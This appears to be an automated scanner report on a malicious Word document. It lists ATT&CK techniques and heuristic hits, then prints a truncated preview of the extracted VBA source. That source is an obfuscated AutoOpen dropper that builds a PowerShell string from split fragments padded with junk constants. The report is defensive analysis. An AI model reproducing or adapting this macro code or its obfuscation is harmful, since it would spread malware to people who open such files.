Verdict: MALICIOUS (Risk Score 350)

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes obfuscation and calls to Shell() and CreateObject(), indicating it is designed to download and execute a second-stage payload. The heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' specifically points to the reassembly of 'scripting.filesystemobject', a strong indicator of malicious intent.
Heuristics (10)
- ClamAV: Doc.Dropper.Agent-7154387-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-7154387-0
- VBA macros detected (medium, 6 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Dangerous API name reassembled from split string literals (critical) [OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

| URL | Channel |
|---|---|
| http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/ | In document text (OLE body) |
| http://purl.org/dc/elements/1.1/ | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/mm/ | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/sType/ResourceEvent# | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/sType/ResourceRef# | In document text (OLE body) |
| http://ns.adobe.com/photoshop/1.0/ | In document text (OLE body) |
| http://ns.adobe.com/tiff/1.0/ | In document text (OLE body) |
| http://ns.adobe.com/exif/1.0/ | In document text (OLE body) |
| http://schemas.openxmlformats.org/drawingml/2006/main | In document text (OLE body) |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75837 bytes |

SHA-256 (macros.bas): 0585cbf00f3c450f17755880beef2799692da628d4c6a6c94fd8f047e8eef4ba

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function er()
End Function
Sub AutoOpen()
Const yu_lieu = False
Const ueahfm = True
Const mjixcp3 = True
Const ea_cb_iyfr0 = False
Const koey = True
Const atuua = False
If 7205 <= 1602 Then
Const ijvroi0 = True
Const kyyaicb = False
Const eigloi = False
Const ulah = True
Const lycwdv = False
ElseIf 16 + 9 = 7 Then
Else
uuueiyfky = "$cdfvibhmunnjq_qa='r"
End If
Select Case "usaaywcu"
Case "usaaywcu"
ys_ukc = "sF';$ee"
uuueiyfky = uuueiyfky + ys_ukc
End Select
Const lioeie42 = False
If 6104 >= 9008 Then
Const yeeug = False
Const ukhrryea = False
Const utnpu_vn = True
Const vxuaygpy = True
Const imiag_a = True
ElseIf 6772 < 7168 Then
ycdxuvqbxhs67 = Environ("SystemRoot")
Else
Const mhdppy4 = True
Const uybluyr7 = True
Const cilzt = False
Const rhjibvw = True
Const aoozpoa = True
End If
Const urue = False
Select Case 42 - 21
Case 21
tzunszww = ee_zyoaie + uuueiyfky
tzunszww = tzunszww + "uozlieuoynvsam"
End Select
Select Case "yfnqhofti"
Case "yfnqhofti"
yeutee = mezzofgbjmv + tzunszww + zcmaeyvf_o
yeutee = yeutee + "y='ion"
Case 23242
Const szqo_xbou = False
End Select
Const tyutc = True
Select Case 14 * 13
Case 182
pgqjzkefekp = "Poli';$mc"
Const a_gaets = True
Const djlaee = False
yeutee = yeutee + pgqjzkefekp
End Select
Const n_fqbr = True
Const itgxre = True
If 48 - 2 = 50 Then
Else
kwpoa = yeutee + wxciomz
Const stv_obdku = True
iuxjo = "nicpqneooaygs=''',';$okmvkhcu_ytvijcgb"
kwpoa = kwpoa + iuxjo
End If
Const kpoesrvz = True
Select Case 34 + 33
Case 67
wzivsmhizbw = yiubxfvz + kwpoa + iijwfnhgat
Const vquwpnn = True
Const ynnohi = True
olmnso_rkwdb = "vohly_urvlrrbaby='.W';$xxoydz"
wzivsmhizbw = oyksiwp + wzivsmhizbw + olmnso_rkwdb
End Select
Const jrnko = True
Const sdnopko = False
If 62 + 39 = 23 Then
ElseIf 88 * 63 = 5544 Then
ayua = "rll"
wzivsmhizbw = wzivsmhizbw + ayua
Else
Const tfnvfix = False
Const y_f_i_osnc = False
Const mnxy = True
Const pra_bo_o = True
Const outhu = True
Const u_aufhebx = False
Const mittpo = True
End If
Const mxaeo = False
Select Case "uaue_y"
Case "uaue_y"
wzivsmhizbw = wzivsmhizbw + "u_tcyib_rf_ygnbgewkwik" + m_fnun
Case ajqnkxzikk
Const ihym = True
Case yippcbanw59
Const wgrdgi = False
End Select
Select Case 13 + 38
Case oaiu_srn7
Const hdunuacn37 = False
Case 51
iafdatbb = wzivsmhizbw + aevu7
iafdatbb = iafdatbb + "dymoxbyhv='{ $ua " + viyewvw
End Select
Const ffyqv01 = False
Const trpstzoqfa = False
If 50 + 51 = -1 Then
Const uz_tiia = False
Const ydmf_yph = True
Const eyboxvz = True
Const ywvj_pyy = True
ElseIf 5413 >= 787 Then
Dim bnfripksldy, uacluz As String
bnfripksldy = "\sys"
ycdxuvqbxhs67 = ycdxuvqbxhs67 + bnfripksldy
Else
Const wexlpdvi = True
Const slwiei = False
Const gaqz = True
Const uie_u = True
Const bbpifjr = True
Const hipbz = False
End If
Const gtitpbnxy = False
If 59 - 73 = 132 Then
Const ohcida = True
Const ojyucd = True
Const snrfxt = False
Const p_uikjo = False
Const jfuudjq = True
Const bplaye = True
Const kfcjpgnzup00 = False
Const yyybgrzv = False
Const oale = False
Const wbsmxyeo = False
Else
eyuuqpiwj = iafdatbb
Const gsux_rh = False
Const oixzg = False
eyuuqpiwj = eyuuqpiwj + "= ';$y_xzi"
End If
Const oapyst = True
If 7 * 46 = 322 Then
asfbjk = eyuuqpiwj
Const iupba = False
asfbjk = asfbjk + "z" + qwzfww
End If
Const qjumci = True
If 5532 <= 7014 Then
o_czviyfdet = asfbjk
obcv = "eaefkljyxdoyazcqhsnwcofriob"
o_czviyfdet = o_czviyfdet + obcv + ufhlvra
ElseIf 50 + 51 = -1 Then
Const yhsiu = True
Const sgo_vql = False
Const frksouimh = True
Const qkeabh = True
Else
End If
Select Case 60 * 77
Case 4620
o_czviyfdet = o_czviyfdet + "chs='le(1)';$jncdxoacycyg
... (truncated)